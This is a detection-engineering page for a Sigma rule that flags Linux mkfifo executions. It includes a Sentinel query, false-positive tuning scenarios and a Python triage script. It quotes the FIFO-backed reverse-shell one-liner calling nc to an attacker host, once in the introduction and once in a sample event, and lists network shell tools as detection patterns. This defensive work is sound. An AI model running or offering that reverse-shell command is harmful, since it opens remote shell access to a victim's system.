Creating a named pipe with mkfifo is a common building block of a FIFO-backed reverse shell on Linux (the well-known one-liner `rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER PORT > /tmp/f`) and can also provide a covert local channel between a loader and its payload. Because the pipe lives on the filesystem and the shell itself is a stock binary, this activity can slip past file- and network-signature based controls, so SOC teams should hunt for mkfifo executions in Azure Sentinel and triage each hit against its parent process, the FIFO path and the rest of the initiating command line.
Detection Rule
title: Named Pipe Created Via Mkfifo
id: 9d779ce8-5256-4b13-8b6f-b91c602b43f4
status: test
description: Detects the creation of a new named pipe using the "mkfifo" utility
references:
    - https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk
    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-16
tags:
    - attack.execution
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|endswith: '/mkfifo'
    condition: selection
falsepositives:
    - Unknown
level: low
imProcessCreate
| where TargetProcessName endswith "/mkfifo"
Scenario: System Administrator Creates Named Pipe for Inter-Process Communication (IPC)
Description: A sysadmin uses mkfifo to set up a named pipe for communication between two services.
Filter/Exclusion: Key the exclusion on the FIFO path and the parent process, for example pipes created under the service's own runtime directory under /var/run or under its install prefix under /usr/local. Do not exclude on the user: root is precisely the context in which a post-exploitation reverse shell runs. Do not exclude /tmp either, since that is where the FIFO reverse-shell one-liner normally puts its pipe.
Scenario: Scheduled Job Uses Named Pipe for Data Streaming
Description: A cron job or systemd timer creates a named pipe to stream data between services (e.g., log aggregation or real-time monitoring).
Filter/Exclusion: Filter on the parent process (cron/crond, systemd, logrotate) and corroborate the run against the job definition (the crontab or timer unit) and the CRON entries in /var/log/syslog or /var/log/cron. Keep the FIFO path in the exclusion as well: scheduled jobs are also a common persistence mechanism, so a cron-spawned mkfifo that writes to /tmp still deserves a look.
Scenario: Developer Testing Pipe-Based Communication
Description: A developer uses mkfifo in a test script to simulate pipe-based communication between two processes (e.g., for testing a microservice architecture).
Filter/Exclusion: Exclude FIFO paths under development working trees (e.g., /home/dev/project/) or events from the accounts of development teams, keeping the path pattern narrow; a compromised developer account lands in the same home directories.
Scenario: Network Monitoring Tool Uses Named Pipe for Data Aggregation
Description: A network monitoring tool (e.g., nagios, prometheus, or telegraf) creates a named pipe to aggregate metrics from multiple sources.
Filter/Exclusion: Exclude events whose parent is the known monitoring binary or whose FIFO path is under its directory (e.g., /opt/prometheus/, /etc/nagios/), rather than matching on the service name alone.
Scenario: Containerized Application Uses Named Pipe for Inter-Container Communication
Description: A Docker or Kubernetes container uses a named pipe to communicate between containers or with the host system.
*Filter/
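As an added, self-contained example (not code from the Sigma rule, from the Nextron rule set, or a Sentinel query), the Python below replays the rule's selection and the tuning discussed in the scenarios over a few constructed process-creation events. Field names mirror the ASIM ProcessEvent columns that imProcessCreate exposes (TargetProcessName, TargetProcessCommandLine, ParentProcessName, ActingProcessCommandLine, ActorUsername); that column mapping, the allow-listed directories and every event are assumptions made for the example.

```python
"""Replay of the mkfifo detection with the scenario-based tuning applied.
Added example; not part of the Sigma rule or the Sentinel query.  The field
names mirror ASIM ProcessEvent columns as an assumption; all events below
are constructed for this example, not real telemetry."""
from __future__ import annotations

from dataclasses import dataclass
import shlex

# Parents that legitimately spawn mkfifo from scheduled jobs (scenario 2).
SCHEDULER_PARENTS = {
    "/usr/sbin/cron", "/usr/sbin/crond", "/usr/lib/systemd/systemd", "/usr/sbin/logrotate",
}
# Directories where monitoring stacks are expected to create FIFOs (scenario 4);
# site-specific and assumed here.
ALLOWED_FIFO_PREFIXES = ("/opt/prometheus/", "/var/lib/telegraf/", "/var/run/")
# World-writable directories favoured by the FIFO-backed reverse-shell one-liner.
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Network clients that sit next to mkfifo in that one-liner.
NETWORK_TOOLS = {"nc", "ncat", "netcat", "socat", "telnet", "openssl"}


@dataclass
class ProcessEvent:
    TargetProcessName: str            # full path of the started process
    TargetProcessCommandLine: str     # its command line
    ParentProcessName: str            # full path of the parent
    ActingProcessCommandLine: str     # command line of the shell that ran it (assumed column)
    ActorUsername: str


def matches_rule(ev: ProcessEvent) -> bool:
    """The Sigma selection: Image|endswith '/mkfifo'."""
    return ev.TargetProcessName.endswith("/mkfifo")


def fifo_paths(cmdline: str) -> list[str]:
    """Positional arguments of an mkfifo command line, i.e. the FIFOs it creates.
    Skips the separate-argument form of -m/--mode so the mode is not taken for a path."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:            # unbalanced quotes: fall back to a plain split
        argv = cmdline.split()
    paths, skip_next = [], False
    for arg in argv[1:]:
        if skip_next:
            skip_next = False
            continue
        if arg in ("-m", "--mode"):
            skip_next = True
            continue
        if arg.startswith("-"):
            continue
        paths.append(arg)
    return paths


def mentions_network_tool(cmdline: str) -> bool:
    """True if the initiating shell's command line also invokes a network client,
    whatever pipe or separator layout sits between the commands."""
    for sep in "|;&":
        cmdline = cmdline.replace(sep, " ")
    return any(tok.rsplit("/", 1)[-1] in NETWORK_TOOLS for tok in cmdline.split())


def triage(ev: ProcessEvent) -> tuple[str, str]:
    """Return (severity, reason) for one event.  Nothing is keyed on ActorUsername:
    a reverse shell running as root is the case the rule exists for."""
    if not matches_rule(ev):
        return "none", "not an mkfifo execution"
    paths = fifo_paths(ev.TargetProcessCommandLine)
    if mentions_network_tool(ev.ActingProcessCommandLine):
        return "high", "mkfifo chained with a network client (reverse-shell idiom)"
    if any(p.startswith(TEMP_DIRS) for p in paths):
        return "medium", "FIFO created in a world-writable temp directory"
    if paths and all(p.startswith(ALLOWED_FIFO_PREFIXES) for p in paths):
        return "info", "FIFO under an allow-listed service directory"
    if ev.ParentProcessName in SCHEDULER_PARENTS:
        return "info", "spawned by a scheduler; corroborate against the job definition"
    return "low", "unexplained mkfifo; review parent and path"


# Constructed events for this example (not real telemetry).
SAMPLE_EVENTS = [
    ProcessEvent("/usr/bin/mkfifo", "mkfifo /tmp/f", "/bin/sh",
                 '/bin/sh -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 '
                 '| nc 203.0.113.5 4444 > /tmp/f"', "root"),
    ProcessEvent("/usr/bin/mkfifo", "mkfifo /var/lib/telegraf/metrics.fifo",
                 "/usr/lib/systemd/systemd",
                 "/usr/bin/telegraf --config /etc/telegraf/telegraf.conf", "telegraf"),
    ProcessEvent("/usr/bin/mkfifo", "mkfifo -m 600 /home/dev/project/test.pipe",
                 "/bin/bash", "/bin/bash ./run_tests.sh", "dev"),
    ProcessEvent("/usr/bin/cat", "cat /etc/hostname", "/bin/bash", "/bin/bash", "dev"),
]


def triage_all(events: list[ProcessEvent]) -> list[tuple[str, str, str]]:
    """(user, severity, reason) for every event that matches the rule."""
    return [(ev.ActorUsername, *triage(ev)) for ev in events if matches_rule(ev)]


if __name__ == "__main__":
    for user, severity, reason in triage_all(SAMPLE_EVENTS):
        print(f"{severity:6} {user:8} {reason}")
```

The ordering in triage is deliberate: a network client in the initiating command line, or a FIFO under /tmp, /var/tmp or /dev/shm, outranks both the allow-listed directories and a scheduler parent, so a cron-persisted reverse shell is not silenced by the scenario-2 exclusion, and the developer case is only downgraded, never dropped. Nothing is keyed on the user name.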